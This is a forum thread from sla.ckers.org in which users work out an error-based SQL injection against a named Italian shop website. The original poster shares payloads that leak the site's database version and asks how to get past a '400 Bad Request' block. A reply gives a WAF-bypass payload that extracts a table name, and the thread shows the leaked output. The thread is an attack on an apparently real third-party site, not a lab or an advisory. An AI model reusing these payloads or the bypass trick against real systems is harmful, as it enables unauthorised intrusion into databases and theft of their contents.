Cenzic 232 Patent
Paid Advertising
sla.ckers.org is
ha.ckers sla.cking
Sla.ckers.org
How do you completely compromise a machine given a text box or badly validated input box? This is a place to talk about code issues (PHP includes, null byte injection, backticks, pipe, etc...) as well as how to properly construct an SQL injection attack. 
Go to Topic: PreviousNext
Go to: Forum ListMessage ListNew TopicSearchLog In
how to bypass 400 bad request in sqli error based method?
Posted by: x_inject
Date: October 18, 2013 04:44AM

can u help me

how to bypass 400 bad request in sqli error based method ?

website: http://www.terraceslife.it/shop.php?cat=3

[ POC ]
##version##
http://www.terraceslife.it/shop.php?cat=3 or 1 group by concat_ws(0x3a,version(),floor(rand(0)*2)) having min(0) or 1--
#####
Duplicate entry '5.0.92-enterprise-gpl-log:1' for key 1
#####

##use table##
http://www.terraceslife.it/shop.php?cat=-3 and (select 1 from (select count(*),concat((select(select concat(cast(table_name as char),0x7e)) from information_schema.tables where table_schema=database() limit 0,1),floor(rand(0)*2))x from information_schema.tables group by x)a)--

####
Bad Request

Your browser sent a request that this server could not understand.
####

Options: ReplyQuote
Re: how to bypass 400 bad request in sqli error based method?
Posted by: ajkaro
Date: October 18, 2013 11:59AM

You should bypass WAF

http://www.terraceslife.it/shop.php?cat=3 +or+1+group+by+concat_ws(0x7e,(select+table_name+from+informa%54ion_schema.tables+where+table_schema=database()+limit+0,1),floor(rand(0)*2))+having+min(0)--

Duplicate entry 'config~1' for key 1

Options: ReplyQuote
Re: how to bypass 400 bad request in sqli error based method?
Posted by: firestorm
Date: October 19, 2013 07:47AM

nice one ajkaro!

Options: ReplyQuote
Re: how to bypass 400 bad request in sqli error based method?
Posted by: x_inject
Date: October 20, 2013 12:14PM

thank you very much ajkaro !!

Options: ReplyQuote


Sorry, only registered users may post in this forum.